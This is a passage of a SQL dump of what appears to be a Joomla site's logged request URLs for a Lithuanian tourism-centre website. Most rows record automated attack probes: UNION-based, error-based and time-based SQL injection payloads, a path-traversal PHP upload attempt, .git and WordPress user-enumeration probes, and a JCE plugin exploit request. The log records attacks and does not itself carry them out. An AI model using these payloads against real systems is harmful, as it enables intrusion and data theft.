00:00:00'),(5163,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:53','0000-00-00 00:00:00'),(5164,'https://www.infotytuvenai.lt/index.php/lt/apie-centra999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:55','0000-00-00 00:00:00'),(5165,'https://www.infotytuvenai.lt/index.php/lt/maitinimas999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:56','0000-00-00 00:00:00'),(5166,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:58:57','0000-00-00 00:00:00'),(5167,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' AnD sLeep(3) ANd \'1','','','',2,0,'2022-02-21 01:58:57','0000-00-00 00:00:00'),(5168,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:58:56','0000-00-00 00:00:00'),(5169,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:58','0000-00-00 00:00:00'),(5170,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:56','0000-00-00 00:00:00'),(5171,'https://www.infotytuvenai.lt/index.php/lt/apie-centra99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:58:59','0000-00-00 00:00:00'),(5172,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45) --  /*','','','',1,0,'2022-02-21 01:58:59','0000-00-00 00:00:00'),(5173,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:58:59','0000-00-00 00:00:00'),(5174,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\" and \"x\"=\"x','','','',1,0,'2022-02-21 01:58:58','0000-00-00 00:00:00'),(5175,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:00','0000-00-00 00:00:00'),(5176,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:59','0000-00-00 00:00:00'),(5177,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:01','0000-00-00 00:00:00'),(5178,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:02','0000-00-00 00:00:00'),(5179,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai or (1,2)=(select*from(select name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1),name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:03','0000-00-00 00:00:00'),(5180,'https://www.infotytuvenai.lt/index.php/lt/apie-centra99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:03','0000-00-00 00:00:00'),(5181,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:04','0000-00-00 00:00:00'),(5182,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:59:03','0000-00-00 00:00:00'),(5183,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' or (1,2)=(select*from(select name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1),name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:05','0000-00-00 00:00:00'),(5184,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:06','0000-00-00 00:00:00'),(5185,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:06','0000-00-00 00:00:00'),(5186,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos or (1,2)=(select*from(select name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1),name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:04','0000-00-00 00:00:00'),(5187,'https://www.infotytuvenai.lt/index.php/lt/apie-centra or (1,2)=(select*from(select name_const(CHAR(116,116,121,118,101,112,115,108,66),1),name_const(CHAR(116,116,121,118,101,112,115,108,66),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:06','0000-00-00 00:00:00'),(5188,'https://www.infotytuvenai.lt/index.php/lt/maitinimas or (1,2)=(select*from(select name_const(CHAR(77,70,114,72,75,113,118,74,74,85),1),name_const(CHAR(77,70,114,72,75,113,118,74,74,85),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:08','0000-00-00 00:00:00'),(5189,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\" or (1,2)=(select*from(select name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1),name_const(CHAR(112,79,105,68,87,101,116,89,112,67,85),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:08','0000-00-00 00:00:00'),(5190,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:59:06','0000-00-00 00:00:00'),(5191,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:09','0000-00-00 00:00:00'),(5192,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:09','0000-00-00 00:00:00'),(5193,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:59:08','0000-00-00 00:00:00'),(5194,'https://www.infotytuvenai.lt/index.php/lt/apie-centra\' or (1,2)=(select*from(select name_const(CHAR(116,116,121,118,101,112,115,108,66),1),name_const(CHAR(116,116,121,118,101,112,115,108,66),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:10','0000-00-00 00:00:00'),(5195,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas or (1,2)=(select*from(select name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1),name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:10','0000-00-00 00:00:00'),(5196,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:11','0000-00-00 00:00:00'),(5197,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,4','','','',1,0,'2022-02-21 01:59:11','0000-00-00 00:00:00'),(5198,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos or (1,2)=(select*from(select name_const(CHAR(79,116,115,121,70,69,81,78,97,70),1),name_const(CHAR(79,116,115,121,70,69,81,78,97,70),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:10','0000-00-00 00:00:00'),(5199,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' or (1,2)=(select*from(select name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1),name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:10','0000-00-00 00:00:00'),(5200,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:59:12','0000-00-00 00:00:00'),(5201,'https://www.infotytuvenai.lt/index.php/lt/apie-centra\" or (1,2)=(select*from(select name_const(CHAR(116,116,121,118,101,112,115,108,66),1),name_const(CHAR(116,116,121,118,101,112,115,108,66),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:13','0000-00-00 00:00:00'),(5202,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' or (1,2)=(select*from(select name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1),name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:13','0000-00-00 00:00:00'),(5204,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:13','0000-00-00 00:00:00'),(5205,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\" or (1,2)=(select*from(select name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1),name_const(CHAR(98,66,118,80,90,112,105,112,78,97,122),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:14','0000-00-00 00:00:00'),(5206,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\" or (1,2)=(select*from(select name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1),name_const(CHAR(80,104,88,68,90,86,120,68,84,70,68),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:15','0000-00-00 00:00:00'),(5208,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:16','0000-00-00 00:00:00'),(5209,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:14','0000-00-00 00:00:00'),(5210,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:14','0000-00-00 00:00:00'),(5212,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) --  /*','','','',1,0,'2022-02-21 01:59:17','0000-00-00 00:00:00'),(5213,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:18','0000-00-00 00:00:00'),(5214,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,4','','','',1,0,'2022-02-21 01:59:19','0000-00-00 00:00:00'),(5216,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu or (1,2)=(select*from(select name_const(CHAR(115,111,81,78,88,90,120,122,81,119,89,121),1),name_const(CHAR(115,111,81,78,88,90,120,122,81,119,89,121),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:18','0000-00-00 00:00:00'),(5217,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis or (1,2)=(select*from(select name_const(CHAR(120,67,70,108,114,75,83,109,82),1),name_const(CHAR(120,67,70,108,114,75,83,109,82),1))a) -- and 1=1','','','',1,0,'2022-02-21 01:59:20','0000-00-00 00:00:00'),(5221,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' or (1,2)=(select*from(select name_const(CHAR(120,67,70,108,114,75,83,109,82),1),name_const(CHAR(120,67,70,108,114,75,83,109,82),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 01:59:22','0000-00-00 00:00:00'),(5225,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\" or (1,2)=(select*from(select name_const(CHAR(115,111,81,78,88,90,120,122,81,119,89,121),1),name_const(CHAR(115,111,81,78,88,90,120,122,81,119,89,121),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:23','0000-00-00 00:00:00'),(5226,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\" or (1,2)=(select*from(select name_const(CHAR(120,67,70,108,114,75,83,109,82),1),name_const(CHAR(120,67,70,108,114,75,83,109,82),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 01:59:24','0000-00-00 00:00:00'),(5250,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:39','0000-00-00 00:00:00'),(5252,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:40','0000-00-00 00:00:00'),(5254,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:41','0000-00-00 00:00:00'),(5258,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:45','0000-00-00 00:00:00'),(5259,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:46','0000-00-00 00:00:00'),(5260,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:46','0000-00-00 00:00:00'),(5261,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:47','0000-00-00 00:00:00'),(5262,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:47','0000-00-00 00:00:00'),(5263,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,','','','',1,0,'2022-02-21 01:59:48','0000-00-00 00:00:00'),(5264,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:49','0000-00-00 00:00:00'),(5266,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2022-02-21 01:59:50','0000-00-00 00:00:00'),(5268,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,','','','',1,0,'2022-02-21 01:59:51','0000-00-00 00:00:00'),(5303,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:13','0000-00-00 00:00:00'),(5305,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:14','0000-00-00 00:00:00'),(5307,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:16','0000-00-00 00:00:00'),(5308,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:16','0000-00-00 00:00:00'),(5309,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:17','0000-00-00 00:00:00'),(5310,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:18','0000-00-00 00:00:00'),(5311,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:18','0000-00-00 00:00:00'),(5312,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:19','0000-00-00 00:00:00'),(5313,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content1111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,','','','',1,0,'2022-02-21 02:00:20','0000-00-00 00:00:00'),(5314,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:20','0000-00-00 00:00:00'),(5316,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2022-02-21 02:00:22','0000-00-00 00:00:00'),(5318,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,','','','',1,0,'2022-02-21 02:00:23','0000-00-00 00:00:00'),(5355,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\'&&sLEEp(3)&&\'1','','','',1,0,'2022-02-21 02:00:47','0000-00-00 00:00:00'),(5356,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\0\'||SLeeP(3)&&\'1','','','',1,0,'2022-02-21 02:00:48','0000-00-00 00:00:00'),(5357,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' aND BeNChMaRK(2999999,Md5(NoW())) AnD \'1','','','',1,0,'2022-02-21 02:00:49','0000-00-00 00:00:00'),(5358,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\'&&BeNChMaRK(2999999,mD5(NOW()))&&\'1','','','',1,0,'2022-02-21 02:00:51','0000-00-00 00:00:00'),(5359,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content or (1,2)=(select*from(select name_const(CHAR(117,110,77,68,112,121,110,122,108),1),name_const(CHAR(117,110,77,68,112,121,110,122,108),1))a) -- and 1=1','','','',1,0,'2022-02-21 02:00:52','0000-00-00 00:00:00'),(5360,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' or (1,2)=(select*from(select name_const(CHAR(117,110,77,68,112,121,110,122,108),1),name_const(CHAR(117,110,77,68,112,121,110,122,108),1))a) -- \'x\'=\'x','','','',1,0,'2022-02-21 02:00:53','0000-00-00 00:00:00'),(5361,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\" or (1,2)=(select*from(select name_const(CHAR(117,110,77,68,112,121,110,122,108),1),name_const(CHAR(117,110,77,68,112,121,110,122,108),1))a) -- \"x\"=\"x','','','',1,0,'2022-02-21 02:00:55','0000-00-00 00:00:00'),(5362,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 02:00:56','0000-00-00 00:00:00'),(5363,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 02:00:57','0000-00-00 00:00:00'),(5364,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 02:00:58','0000-00-00 00:00:00'),(5365,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=306999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 02:01:08','0000-00-00 00:00:00'),(5366,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30699999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2022-02-21 02:01:09','0000-00-00 00:00:00'),(5367,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30699999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2022-02-21 02:01:11','0000-00-00 00:00:00'),(5368,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai4','','','',3,0,'2022-03-02 10:40:30','0000-00-00 00:00:00'),(5369,'https://www.infotytuvenai.lt/index.php/lt/apie-centraVšĮ \"Tomo Mano kultūros centras\"','','','',1,0,'2022-03-04 09:03:09','0000-00-00 00:00:00'),(5370,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_164684243.php','','','',1,0,'2022-03-09 16:21:47','0000-00-00 00:00:00'),(5371,'https://www.infotytuvenai.lt/index.php/lt/.git/HEAD','','','',6,0,'2022-03-21 16:26:30','0000-00-00 00:00:00'),(5372,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/.git/HEAD','','','',3,0,'2022-03-21 16:26:30','0000-00-00 00:00:00'),(5373,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/.git/HEAD','','','',5,0,'2022-03-21 16:26:30','0000-00-00 00:00:00'),(5374,'https://www.infotytuvenai.lt/index.php/lt/projektai/.git/HEAD','','','',3,0,'2022-03-21 16:26:39','0000-00-00 00:00:00'),(5375,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/.git/HEAD','','','',3,0,'2022-03-21 16:26:40','0000-00-00 00:00:00'),(5376,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/.git/HEAD','','','',3,0,'2022-03-21 16:26:39','0000-00-00 00:00:00'),(5377,'https://infotytuvenai.lt/index.php/lt/?option=com_user&view=register','','https://infotytuvenai.lt/index.php?option=com_user&view=register','',12,0,'2022-03-25 20:34:40','0000-00-00 00:00:00'),(5378,'https://infotytuvenai.lt/index.php/lt/component/user?task=register','','https://infotytuvenai.lt/index.php/component/user/?task=register','',12,0,'2022-03-25 20:34:41','0000-00-00 00:00:00'),(5379,'https://infotytuvenai.lt/index.php/lt/using-joomla/extensions/components/users-component/registration-form','','https://infotytuvenai.lt/index.php/using-joomla/extensions/components/users-component/registration-form','',7,0,'2022-03-25 20:34:46','0000-00-00 00:00:00'),(5380,'https://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/368-konkursas','','','',61,0,'2022-04-04 18:09:59','0000-00-00 00:00:00'),(5381,'https://www.infotytuvenai.lt/index.php/lt/wp-json/wp/v2/users','','','',2,0,'2022-04-04 19:21:16','0000-00-00 00:00:00'),(5382,'https://www.infotytuvenai.lt/index.php/lt//wp-json/wp/v2/users','','','',1,0,'2022-04-04 19:21:20','0000-00-00 00:00:00'),(5383,'https://www.infotytuvenai.lt/index.php/lt/infotytuvenailt','','https://www.google.co.jp/','',4,0,'2022-04-05 10:21:57','0000-00-00 00:00:00'),(5384,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/368-konkursas','','','',13,0,'2022-04-05 16:20:43','0000-00-00 00:00:00'),(5385,'https://infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/368-konkursas','','','',7,0,'2022-04-07 23:44:53','0000-00-00 00:00:00'),(5386,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/44-paskutinesnaujienos/368-konkursas','','','',2,0,'2022-04-12 00:39:11','0000-00-00 00:00:00'),(5387,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw','','','',1,0,'2022-04-17 07:43:10','0000-00-00 00:00:00'),(5388,'https://www.infotytuvenai.lt/index.php/en/44-paskutinesnaujienos/368-konkursas','','','',9,0,'2022-04-18 01:41:03','0000-00-00 00:00:00'),(5389,'https://www.infotytuvenai.lt/index.php/lt/templates/tytuvenu_piligrimu_centras/js/fixed-menu.js','','','',6,0,'2022-05-13 12:00:55','0000-00-00 00:00:00'),(5390,'https://www.infotytuvenai.lt/index.php/lt/media/system/js/mootools-core.js','','','',6,0,'2022-05-13 12:00:55','0000-00-00 00:00:00'),(5391,'https://www.infotytuvenai.lt/index.php/lt/modules/mod_sp_smart_slider/tmpl/university/js/sp-smart-slider.js','','','',6,0,'2022-05-13 12:00:57','0000-00-00 00:00:00'),(5392,'https://www.infotytuvenai.lt/index.php/lt/media/system/js/core.js','','','',6,0,'2022-05-13 12:00:57','0000-00-00 00:00:00'),(5393,'https://www.infotytuvenai.lt/index.php/lt/media/k2/assets/js/jquery-1.8.3.min.js','','','',6,0,'2022-05-13 12:00:58','0000-00-00 00:00:00'),(5394,'https://www.infotytuvenai.lt/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',7,0,'2022-05-13 12:00:59','0000-00-00 